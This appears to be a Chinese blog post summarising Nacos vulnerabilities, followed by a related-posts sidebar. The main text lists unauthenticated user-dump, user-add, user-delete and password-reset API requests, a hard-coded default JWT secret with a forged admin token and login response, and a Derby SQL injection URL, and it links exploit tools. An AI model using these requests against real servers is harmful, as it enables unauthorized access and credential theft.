nacos漏洞小结

已于 2024-07-16 08:48:12 修改
阅读量786 收藏 26
点赞数 19
分类专栏: 渗透 文章标签: 安全
于 2024-07-01 10:03:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61475980/article/details/140091633
版权

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

指纹:app="nacos"

默认密码nacos/nacos

漏洞1-权限绕过漏洞

1.1-获取已有的用户列表的账号和密码

在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取到已有的用户名和密码,可以把User-Agent头改为Nacos-Server,如图

1.2-任意用户添加

更改提交方式为POST , 访问/nacos/v1/auth/users?username=test111&password=test222

新建一个账号test111,可以看到创建用户成功,如图

1.3-任意用户删除

更改提交方式为DELETE , 访问DELETE /nacos/v1/auth/users?username=test111

可以看到用户删除成功,如图

1.4-用户密码重置

更改提交方式为PUT,访问 /nacos/v1/auth/users?username=test1&newPassword=test222

1.5-配置信息泄露

在路径后面加上/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99

洞2-token.secret.key默认配置(QVD-2023-6271)

Nacos使用token.secret.key来进行身份认证和加密。在Nacos版本 <= 2.2.0 时,这个密钥是固定的默认值,导致存在一个安全漏洞。攻击者可以利用这个默认密钥构造JWT,绕过身份认证并进入Nacos后台,从而对系统进行控制。

这个漏洞个人认为是最常见的一个,有一半以上的nacos系统都存在这个洞。

SecretKey012345678901234567890123456789012345678901234567890123456789

填入密钥,填入新的时间戳,勾选secret base64 encoded,获取新的token

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwiZXhwIjoiNDA4NjY2MTEyOCIsImlhdCI6MTUxNjIzOTAyMn0.UMQFlbGKwRmxGCNipH9yrtFPcmr934rjPJE8del3q8k

然后在登陆界面输入任意账户密码 ,点击登录。更改改返回包状态码跟body

图片


{
"accessToken":
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwiZXhwIjoiNDA4NjY2MTEyOCIsImlhdCI6MTUxNjIzOTAyMn0.UMQFlbGKwRmxGCNipH9yrtFPcmr934rjPJE8del3q8k",
"tokenTtl": 18000,
"globalAdmin": true,"username":"nacos"
}

然后成功登录nacos账号

洞3-Nacos Derby SQL注入漏洞  (CNVD-2020-67618)

/nacos/v1/cs/ops/derby?sql=select * from users

这是一个注入点

洞4-Nacos 集群 Raft Hessian 反序列化漏洞 反序列化漏洞 (CNVD-2023-45001)

Nacos 1.4.1+在单机模式下默认不开放7848端口,故该情况通常不受此漏洞影响。然而,1.4.0、2.x版本无论单机或集群模式均默认开放7848端口。
所以最终影响范围是:
1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行
2.0.0 <= Nacos < 2.2.3 任意模式启动均受到影响

https://github.com/charonlight/NacosExploitGUI

洞5-Nacos-Client Yaml反序列化

利用:

https://github.com/charonlight/NacosExploitGUI

漏洞6-利用Derby SQL漏洞RCE

https://mp.weixin.qq.com/s/hXtpkc-PNMS8LuXbVRxP5g

https://mp.weixin.qq.com/s/ShAtmPAW2ONCbnza9Da-LA

参考

https://mp.weixin.qq.com/s?__biz=MzkyOTMxNDM3Ng==&mid=2247488470&idx=1&sn=3cf9f8d4d3fd8348e5892153d565b395&chksm=c36f650de5053aab2024fb0fc12322396c554fb03fc8c17adbe4194145c1a89e4b9f51fd62b8&scene=126&sessionid=1713370439&key=58349ff90672df9829e6924cfc57517ee7e58625f070922c45f5af210801e70276eb4a689056fd0960d8dc5f403cbee7615e8a8e7f5f703ce00d812f7fac6d4db56642cfcb63adbe7418c3eec5e10b064bd28f7016ec971ed7a03ca6567bcd1e7fd1c5203e377389a2ec1d468bf1ac8e33296f54599ad5751ad29fde037be74f&ascene=15&uin=NTY2NTA4NjQ%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_26cb3abead85&countrycode=AL&exportkey=n_ChQIAhIQgo%2F0zroKlgleqOV2m0JGURLuAQIE97dBBAEAAAAAANkSNcr3NjcAAAAOpnltbLcz9gKNyK89dVj0%2FT3gG0eYVXjNiToxQo5St79l90A%2BfC9aAki5MgpTumq85GqFI5kijd7yu6Tf1%2F2qBLw4v%2FP5LOaG5iMpZGxGKqJ%2Fu3mSwaimgTVd4tBdAvjxp%2FY8pG7lbYuJ8UqhIPNtD488y8Gl53tMsWzuYB1OdJTPqLzKp0LWxZJuclBE%2FB%2BLrh%2FSWtb3tNRETI5ZhK%2FoQ07KxieCca61IJ03ukMZc7Z0Hyr%2B%2FTcbX5Pf4cu7yHI4pZib9UUekQhMblWsn1EQPuFQYCZr7T0%3D&acctmode=0&pass_ticket=eq8HCji1DfXBOtEbPkSsc2TsXg7z3fUce6vSp7oYpIevjMHBe69CXIaB5taxqR93LsA4cuKuMt3CimuizC5UFg%3D%3D&wx_header=0&fontgear=2&poc_token=HKl_gWajBUI7atk2qu8rrVhwt5Ia6zTmApeYG7JX

https://www.freebuf.com/articles/web/384857.html

https://www.cnblogs.com/thebeastofwar/p/17920565.html

『 』785
关注
  • 19
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Nacos Derby SQL注入漏洞
晚风不及你
04-28 1396
Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传的,请放心下载使用。 2、适用人群:主要针对计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、数学、电子信息等)的同学或企业员工下载使用,具有较高的学习借鉴价值。 3、不仅适合小白学习实战练习,也可作为大作业、课程设计、毕设项目、初期项目立项演示等,欢迎下载,互相学习,共同进步! Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 1439
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
nacos漏洞汇总
最新发布
潇逗
06-27 1366
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。指纹:app=“nacos”默认密码nacos nacos
漏洞实战(1):NACOS默认密钥漏洞QVD-2023-6271
OneMoreThink
03-09 3387
原理危害攻击资产发现漏洞利用防御1、原理NACOS[1],/nɑ:kəʊs/,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。在<=2.2.0、<=1.4.4的版本中,NACOS的配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey01...
Nacos漏洞总结复现
喜欢Python编程的程序员柚柚呀
06-20 644
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
漏洞复现】Alibaba Nacos 未授权访问漏洞
Nday_Seeker
03-20 1155
Alibaba Nacos中存在未授权访问漏洞,该漏洞源于com.alibaba.nacos.core.auth.AuthFilter#doFilter在处理服务间通信时存在默认鉴权白名单,其代码在解析请求时,会判断User-Agent值,只要是以Constants.NACOS_SERVER_HEADER字符串(Nacos-Server)开头,则跳过后续的任何鉴权。攻击者可利用该漏洞发送特殊数据绕过身份认证,从而调用任何接口,获取内部数据或添加任意用户,进一步利用甚至可能执行恶意代码。
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用!...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
nacos 2.2.3版本
06-29
Nacos 2.2.3版本中,重点是修复了之前版本存在的安全漏洞和性能问题,以提高系统的稳定性和安全性。 首先,让我们深入了解Nacos的核心功能: 1. **服务发现**:Nacos作为一个服务中心,可以让服务提供者注册自己...
Nacos未授权添加用户
m0_64122957的博客
09-07 1658
Nacos 未授权访问漏洞
Nacos 未授权访问漏洞
热门推荐
ljy啊虎的博客
09-07 2万+
Nacos 未授权访问漏洞 /nacos/v1/auth/users?pageNo=1&pageSize=9
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5468
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
nacos漏洞复现
Scorpio_m7
02-09 9637
????写在前面 ????博客主页:Scorpio_m7,github ????欢迎关注????点赞????收藏⭐️留言???? ????本文由 Scorpio_m7原创,CSDN首发! ????首发时间:????2022年2月9日???? ✉️坚持和努力一定能换来诗与远方! ????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! 文章目录????写在前面概述环境搭建Linuxwindows漏洞复现信息泄露任意用户创建使用Spring Boot获得账号及密码关键信息后台未授权登录 概述
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
crowsec
03-17 6855
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
nacos漏洞如何触发
06-03
Nacos存在多个漏洞,不同的漏洞触发方式也不同。以下是一些常见的漏洞触发方式: 1. 认证绕过漏洞:攻击者可以通过构造恶意请求,绕过Nacos的身份认证机制,进而获取敏感信息或者执行未授权操作。 2. SQL注入漏洞:攻击者可以通过在请求参数中注入恶意SQL语句,来执行非授权的数据库操作,包括敏感数据泄露、数据库删除等。 3. 信息泄露漏洞:攻击者可以通过发送恶意请求,获取Nacos中存储的敏感信息,如用户名、密码、密钥等。 4. 任意文件读取漏洞:攻击者可以通过构造恶意请求,读取Nacos服务器上的任意文件,包括敏感的配置文件、日志文件等。 5. 任意文件写入漏洞:攻击者可以通过构造恶意请求,将恶意文件写入到Nacos服务器上,进而执行任意代码。 总之,Nacos漏洞的触发方式多种多样,攻击者可以通过各种手段来攻击Nacos服务器。因此,在使用Nacos时,必须要加强安全措施,包括加强密码管理、限制访问权限等,以避免可能的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值